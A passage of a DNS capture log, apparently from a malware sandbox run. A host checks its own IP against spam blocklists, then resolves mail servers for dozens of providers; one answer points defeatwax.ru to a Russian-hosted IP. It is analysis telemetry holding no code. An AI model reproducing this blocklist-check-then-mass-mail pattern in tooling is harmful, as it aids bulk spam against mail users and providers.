Sep 5, 2021 15:51:56.442769051 CEST	192.168.2.4	8.8.8.8	0x2e67	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.468897104 CEST	192.168.2.4	8.8.8.8	0x9a0	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.503384113 CEST	192.168.2.4	8.8.8.8	0x4637	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.543421030 CEST	192.168.2.4	8.8.8.8	0xda0a	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.614222050 CEST	192.168.2.4	8.8.8.8	0x6e0a	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.688755035 CEST	192.168.2.4	8.8.8.8	0xf720	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.767435074 CEST	192.168.2.4	8.8.8.8	0x238a	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:57.716511011 CEST	192.168.2.4	8.8.8.8	0x11e0	Standard query (0)	mta7.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:57.719460964 CEST	192.168.2.4	8.8.8.8	0x9085	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:57.802659035 CEST	192.168.2.4	8.8.8.8	0x8fcf	Standard query (0)	mx.wp.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:58.090801954 CEST	192.168.2.4	8.8.8.8	0xb540	Standard query (0)	mx2.naver.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:58.396370888 CEST	192.168.2.4	8.8.8.8	0x2b2f	Standard query (0)	mx1.comcast.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.055676937 CEST	192.168.2.4	8.8.8.8	0xaa50	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.059161901 CEST	192.168.2.4	8.8.8.8	0x246f	Standard query (0)	dolphinmail.org	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:59.098659992 CEST	192.168.2.4	8.8.8.8	0x3b8b	Standard query (0)	mail01.dolphinmail.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.177550077 CEST	192.168.2.4	8.8.8.8	0x4d8c	Standard query (0)	mx1.comcast.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.602940083 CEST	192.168.2.4	8.8.8.8	0x1481	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.603338957 CEST	192.168.2.4	8.8.8.8	0xaad2	Standard query (0)	mx00.t-online.de	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.717349052 CEST	192.168.2.4	8.8.8.8	0xa384	Standard query (0)	mx1.comcast.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.915941000 CEST	192.168.2.4	8.8.8.8	0xa2cf	Standard query (0)	onet.pl	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:00.002922058 CEST	192.168.2.4	8.8.8.8	0x42ab	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:00.007268906 CEST	192.168.2.4	8.8.8.8	0x76a3	Standard query (0)	mx.poczta.onet.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:00.691154957 CEST	192.168.2.4	8.8.8.8	0x289e	Standard query (0)	mx.wp.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:00.847249985 CEST	192.168.2.4	8.8.8.8	0xb215	Standard query (0)	post.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:00.885617018 CEST	192.168.2.4	8.8.8.8	0xb91c	Standard query (0)	mx00.mail.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:01.003833055 CEST	192.168.2.4	8.8.8.8	0x750e	Standard query (0)	internetlibero.it	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:01.082559109 CEST	192.168.2.4	8.8.8.8	0x677	Standard query (0)	mail1.penteres.it	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:01.082886934 CEST	192.168.2.4	8.8.8.8	0x9478	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:01.244081020 CEST	192.168.2.4	8.8.8.8	0x707c	Standard query (0)	google.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:01.285690069 CEST	192.168.2.4	8.8.8.8	0xb98b	Standard query (0)	alt2.aspmx.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:01.672724009 CEST	192.168.2.4	8.8.8.8	0xec09	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:01.870306969 CEST	192.168.2.4	8.8.8.8	0x6105	Standard query (0)	earthlink.net	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:01.920552015 CEST	192.168.2.4	8.8.8.8	0x968c	Standard query (0)	mx01.oxsus-vadesecure.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:02.447216034 CEST	192.168.2.4	8.8.8.8	0xb842	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:02.898595095 CEST	192.168.2.4	8.8.8.8	0x2d92	Standard query (0)	jeffersonbox.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:02.938644886 CEST	192.168.2.4	8.8.8.8	0x3587	Standard query (0)	mail01.jeffersonbox.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:03.475918055 CEST	192.168.2.4	8.8.8.8	0x9412	Standard query (0)	edgementoring.org	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:03.648783922 CEST	192.168.2.4	8.8.8.8	0x32de	Standard query (0)	aspmx.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:03.659605980 CEST	192.168.2.4	8.8.8.8	0xa428	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:03.744390965 CEST	192.168.2.4	8.8.8.8	0x2aad	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:04.182738066 CEST	192.168.2.4	8.8.8.8	0xcc98	Standard query (0)	www.google.es	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:04.382756948 CEST	192.168.2.4	8.8.8.8	0xedd8	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:04.486742973 CEST	192.168.2.4	8.8.8.8	0x7bce	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:04.915205002 CEST	192.168.2.4	8.8.8.8	0x6a3d	Standard query (0)	mhtn.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:05.130599022 CEST	192.168.2.4	8.8.8.8	0x24c0	Standard query (0)	mhtn-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:05.144656897 CEST	192.168.2.4	8.8.8.8	0xb0be	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:05.303936958 CEST	192.168.2.4	8.8.8.8	0x5f2a	Standard query (0)	mx.lycos.de.cust.b.hostedemail.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:05.642041922 CEST	192.168.2.4	8.8.8.8	0x967e	Standard query (0)	emig.freenet.de	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:05.794754028 CEST	192.168.2.4	8.8.8.8	0xf988	Standard query (0)	emig.freenet.de	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:05.848422050 CEST	192.168.2.4	8.8.8.8	0xdced	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:05.900340080 CEST	192.168.2.4	8.8.8.8	0x56b0	Standard query (0)	mymdc.net	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:06.184443951 CEST	192.168.2.4	8.8.8.8	0xad35	Standard query (0)	alt2.aspmx.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:06.190294027 CEST	192.168.2.4	8.8.8.8	0x4a64	Standard query (0)	caribsurf.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:06.375775099 CEST	192.168.2.4	8.8.8.8	0x4c97	Standard query (0)	mxin.upcmail.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:06.378128052 CEST	192.168.2.4	8.8.8.8	0x6153	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:06.560636997 CEST	192.168.2.4	8.8.8.8	0x1a85	Standard query (0)	tiscalinet.it	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:06.615623951 CEST	192.168.2.4	8.8.8.8	0x7c12	Standard query (0)	etb-1.mail.tiscali.it	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.360050917 CEST	192.168.2.4	8.8.8.8	0x4380	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.522964954 CEST	192.168.2.4	8.8.8.8	0x4244	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.572776079 CEST	192.168.2.4	8.8.8.8	0x6be3	Standard query (0)	erschools.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:07.631865025 CEST	192.168.2.4	8.8.8.8	0x730	Standard query (0)	aspmx.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.971266985 CEST	192.168.2.4	8.8.8.8	0xa316	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:08.124022961 CEST	192.168.2.4	8.8.8.8	0x2f3c	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:08.499723911 CEST	192.168.2.4	8.8.8.8	0xc1e8	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:09.291501999 CEST	192.168.2.4	8.8.8.8	0x87fb	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:09.479382992 CEST	192.168.2.4	8.8.8.8	0x396e	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:09.748428106 CEST	192.168.2.4	8.8.8.8	0x18ee	Standard query (0)	onlinehome.de	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:09.796487093 CEST	192.168.2.4	8.8.8.8	0xd34f	Standard query (0)	mx00.emig.kundenserver.de	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:09.908899069 CEST	192.168.2.4	8.8.8.8	0x926e	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:09.947957993 CEST	192.168.2.4	8.8.8.8	0x56c0	Standard query (0)	sr-mainz.de	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:10.006124973 CEST	192.168.2.4	8.8.8.8	0x4749	Standard query (0)	hosting.next-provider.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:10.357876062 CEST	192.168.2.4	8.8.8.8	0xbaca	Standard query (0)	stbfendrich.de	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:10.422215939 CEST	192.168.2.4	8.8.8.8	0xbb60	Standard query (0)	mx00.kundenserver.de	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:10.517740965 CEST	192.168.2.4	8.8.8.8	0x3ea6	Standard query (0)	gmqil.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:10.567219973 CEST	192.168.2.4	8.8.8.8	0x293c	Standard query (0)	park-mx.above.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:10.582072020 CEST	192.168.2.4	8.8.8.8	0x90cb	Standard query (0)	mx00.t-online.de	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:10.687639952 CEST	192.168.2.4	8.8.8.8	0xb73	Standard query (0)	mx00.t-online.de	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:10.799792051 CEST	192.168.2.4	8.8.8.8	0xe66b	Standard query (0)	netzero.net	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:10.991641045 CEST	192.168.2.4	8.8.8.8	0x49b6	Standard query (0)	mx.vgs.untd.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:11.085084915 CEST	192.168.2.4	8.8.8.8	0x7cb7	Standard query (0)	netscape.net	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:11.135976076 CEST	192.168.2.4	8.8.8.8	0x282	Standard query (0)	mx-aol.mail.gm0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:11.203298092 CEST	192.168.2.4	8.8.8.8	0x8ed5	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:11.771178961 CEST	192.168.2.4	8.8.8.8	0x368	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:11.994734049 CEST	192.168.2.4	8.8.8.8	0x4864	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.245618105 CEST	192.168.2.4	8.8.8.8	0xc68f	Standard query (0)	whitehouseautomall.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:12.310127020 CEST	192.168.2.4	8.8.8.8	0x8362	Standard query (0)	mail.h-email.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.456504107 CEST	192.168.2.4	8.8.8.8	0xe33f	Standard query (0)	mx.lycos.de.cust.b.hostedemail.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.671097994 CEST	192.168.2.4	8.8.8.8	0x13e3	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.784356117 CEST	192.168.2.4	8.8.8.8	0xb281	Standard query (0)	al-ip4-mx-vip2.prodigy.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.911000967 CEST	192.168.2.4	8.8.8.8	0x8bc7	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:13.453274012 CEST	192.168.2.4	8.8.8.8	0xb5e8	Standard query (0)	mx.lycos.de.cust.b.hostedemail.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:13.516175032 CEST	192.168.2.4	8.8.8.8	0x59bc	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:13.703254938 CEST	192.168.2.4	8.8.8.8	0x7041	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:13.792632103 CEST	192.168.2.4	8.8.8.8	0x774a	Standard query (0)	cxr.mx.a.cloudfilter.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:14.092725992 CEST	192.168.2.4	8.8.8.8	0x5707	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:14.199985981 CEST	192.168.2.4	8.8.8.8	0x9be0	Standard query (0)	fastscreeens.org	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:14.255701065 CEST	192.168.2.4	8.8.8.8	0x15c	Standard query (0)	mx.powered.name	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:14.482125044 CEST	192.168.2.4	8.8.8.8	0x9e05	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:14.558654070 CEST	192.168.2.4	8.8.8.8	0x1c69	Standard query (0)	e.gsasearchengineranker.site	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:14.786434889 CEST	192.168.2.4	8.8.8.8	0x28d7	Standard query (0)	mx37.mb5p.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:14.990675926 CEST	192.168.2.4	8.8.8.8	0xa385	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:15.188129902 CEST	192.168.2.4	8.8.8.8	0xe3a7	Standard query (0)	mx.lycos.com.cust.b.hostedemail.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:15.455023050 CEST	192.168.2.4	8.8.8.8	0xc7cb	Standard query (0)	al-ip4-mx-vip2.prodigy.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:15.512072086 CEST	192.168.2.4	8.8.8.8	0x2cc6	Standard query (0)	mx1.comcast.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:15.674598932 CEST	192.168.2.4	8.8.8.8	0x6b44	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:15.896323919 CEST	192.168.2.4	8.8.8.8	0x819a	Standard query (0)	emig.freenet.de	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.017407894 CEST	192.168.2.4	8.8.8.8	0x9e32	Standard query (0)	smtp-in.sfr.fr	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.157067060 CEST	192.168.2.4	8.8.8.8	0x5daf	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.170123100 CEST	192.168.2.4	8.8.8.8	0x6721	Standard query (0)	emig.freenet.de	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.318104029 CEST	192.168.2.4	8.8.8.8	0x6e64	Standard query (0)	smtp-in.sfr.fr	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.480274916 CEST	192.168.2.4	8.8.8.8	0xcbcc	Standard query (0)	mx-aol.mail.gm0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.535975933 CEST	192.168.2.4	8.8.8.8	0x2ba1	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.813743114 CEST	192.168.2.4	8.8.8.8	0xefc5	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.010629892 CEST	192.168.2.4	8.8.8.8	0x3ae1	Standard query (0)	acomsltd.co.uk	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:17.090627909 CEST	192.168.2.4	8.8.8.8	0x20f5	Standard query (0)	mx0.123-reg.co.uk	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.378917933 CEST	192.168.2.4	8.8.8.8	0xb055	Standard query (0)	mx.tlen.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.477669954 CEST	192.168.2.4	8.8.8.8	0xccb5	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.528669119 CEST	192.168.2.4	8.8.8.8	0xeb47	Standard query (0)	htmail.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:17.685678959 CEST	192.168.2.4	8.8.8.8	0xe3cf	Standard query (0)	mail.mailerhost.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.700373888 CEST	192.168.2.4	8.8.8.8	0x1f1d	Standard query (0)	mx00.t-online.de	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.724991083 CEST	192.168.2.4	8.8.8.8	0x5cbb	Standard query (0)	outlook-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.809737921 CEST	192.168.2.4	8.8.8.8	0xb2e7	Standard query (0)	mx.lycos.de.cust.b.hostedemail.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:18.093250990 CEST	192.168.2.4	8.8.8.8	0x9a24	Standard query (0)	mx00.t-online.de	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:18.201483965 CEST	192.168.2.4	8.8.8.8	0xc22a	Standard query (0)	mx.lb.btinternet.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:18.461405039 CEST	192.168.2.4	8.8.8.8	0x5e59	Standard query (0)	mx1.comcast.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:18.889012098 CEST	192.168.2.4	8.8.8.8	0x1c78	Standard query (0)	mx00.mail.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:19.233319998 CEST	192.168.2.4	8.8.8.8	0x6745	Standard query (0)	cxr.mx.a.cloudfilter.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:19.674633026 CEST	192.168.2.4	8.8.8.8	0x5060	Standard query (0)	al-ip4-mx-vip2.prodigy.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:19.790384054 CEST	192.168.2.4	8.8.8.8	0x609f	Standard query (0)	mx1.seznam.cz	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:21.169492006 CEST	192.168.2.4	8.8.8.8	0x9884	Standard query (0)	energyjustice.net	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:21.458452940 CEST	192.168.2.4	8.8.8.8	0xa55e	Standard query (0)	energyjustice.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:21.999620914 CEST	192.168.2.4	8.8.8.8	0x216f	Standard query (0)	bellatlantic.net	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:22.043797970 CEST	192.168.2.4	8.8.8.8	0x7d3d	Standard query (0)	mx-aol.mail.gm0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:22.943180084 CEST	192.168.2.4	8.8.8.8	0x930	Standard query (0)	xtra.co.nz	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:22.980117083 CEST	192.168.2.4	8.8.8.8	0x3320	Standard query (0)	mx.xtra.co.nz	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:25.759788036 CEST	192.168.2.4	8.8.8.8	0x9554	Standard query (0)	mx.tlen.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:25.781166077 CEST	192.168.2.4	8.8.8.8	0xf53	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:25.784760952 CEST	192.168.2.4	8.8.8.8	0x83d1	Standard query (0)	mx.wp.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:25.926220894 CEST	192.168.2.4	8.8.8.8	0xd2c0	Standard query (0)	qannection.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:25.980345964 CEST	192.168.2.4	8.8.8.8	0xd040	Standard query (0)	smtp.secureserver.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:25.980604887 CEST	192.168.2.4	8.8.8.8	0xafe5	Standard query (0)	smtp-in.sfr.fr	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:26.111903906 CEST	192.168.2.4	8.8.8.8	0x9e0e	Standard query (0)	al-ip4-mx-vip2.prodigy.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:26.405677080 CEST	192.168.2.4	8.8.8.8	0x1155	Standard query (0)	al-ip4-mx-vip2.prodigy.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:26.732379913 CEST	192.168.2.4	8.8.8.8	0x9f3d	Standard query (0)	mx00.emig.kundenserver.de	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:27.380820036 CEST	192.168.2.4	8.8.8.8	0xa033	Standard query (0)	entertainmentbenefits.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:27.424257040 CEST	192.168.2.4	8.8.8.8	0x6548	Standard query (0)	d192721a.ess.barracudanetworks.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:30.056106091 CEST	192.168.2.4	8.8.8.8	0xfa9e	Standard query (0)	teerwater.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:30.216844082 CEST	192.168.2.4	8.8.8.8	0xecdb	Standard query (0)	mx1c40.carrierzone.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:30.853037119 CEST	192.168.2.4	8.8.8.8	0xabbd	Standard query (0)	certifiedtgp.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:30.897092104 CEST	192.168.2.4	8.8.8.8	0x52bf	Standard query (0)	aa.prof-investment.ru	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:31.384675026 CEST	192.168.2.4	8.8.8.8	0x767e	Standard query (0)	uk.flu.cc	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:31.456970930 CEST	192.168.2.4	8.8.8.8	0x7832	Standard query (0)	mx156.hostedmxserver.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:32.077131033 CEST	192.168.2.4	8.8.8.8	0x83bb	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:32.922547102 CEST	192.168.2.4	8.8.8.8	0xf8b4	Standard query (0)	shaw.ca	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:32.963840961 CEST	192.168.2.4	8.8.8.8	0x3a7f	Standard query (0)	shw-central.mx.a.cloudfilter.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:33.395145893 CEST	192.168.2.4	8.8.8.8	0x955e	Standard query (0)	mx-rogers.mail.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:33.931111097 CEST	192.168.2.4	8.8.8.8	0x862a	Standard query (0)	family.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:33.973704100 CEST	192.168.2.4	8.8.8.8	0x360e	Standard query (0)	generalsmtp.disney.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:35.433300972 CEST	192.168.2.4	8.8.8.8	0x22fb	Standard query (0)	lowes.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:35.486659050 CEST	192.168.2.4	8.8.8.8	0xa3e3	Standard query (0)	mxb-00308801.gslb.pphosted.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:37.160140038 CEST	192.168.2.4	8.8.8.8	0xe823	Standard query (0)	invitel.hu	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:37.219558001 CEST	192.168.2.4	8.8.8.8	0xf858	Standard query (0)	invitel.inmx.digicable.hu	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:37.647497892 CEST	192.168.2.4	8.8.8.8	0x1b4d	Standard query (0)	katamail.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:37.688370943 CEST	192.168.2.4	8.8.8.8	0xa326	Standard query (0)	cmgw-km-1.mail.tiscali.it	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:38.308731079 CEST	192.168.2.4	8.8.8.8	0xf438	Standard query (0)	gotmail.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:38.358227015 CEST	192.168.2.4	8.8.8.8	0xb675	Standard query (0)	mail.h-email.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:40.214463949 CEST	192.168.2.4	8.8.8.8	0x1bc7	Standard query (0)	mail.h-email.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:41.846915007 CEST	192.168.2.4	8.8.8.8	0x515	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:42.008063078 CEST	192.168.2.4	8.8.8.8	0xa18d	Standard query (0)	xn--wolno-sowa-uhb42e7j.slask.pl	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:42.122998953 CEST	192.168.2.4	8.8.8.8	0xfe06	Standard query (0)	mail.xn--wolno-sowa-uhb42e7j.slask.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:42.879734993 CEST	192.168.2.4	8.8.8.8	0x8926	Standard query (0)	mixmail.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:42.934837103 CEST	192.168.2.4	8.8.8.8	0xf8fa	Standard query (0)	ing.wanadoo.es	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:43.083442926 CEST	192.168.2.4	8.8.8.8	0xe5e4	Standard query (0)	mail01.jeffersonbox.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 5, 2021 15:50:06.632002115 CEST	8.8.8.8	192.168.2.4	0x2997	No error (0)	microsoft-com.mail.protection.outlook.com		104.47.53.36	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:06.632002115 CEST	8.8.8.8	192.168.2.4	0x2997	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.212.0	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:09.344552994 CEST	8.8.8.8	192.168.2.4	0xef59	No error (0)	defeatwax.ru		193.56.146.188	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:12.658041000 CEST	8.8.8.8	192.168.2.4	0xbd41	No error (0)	rediffmail.com			MX (Mail exchange)	IN (0x0001)
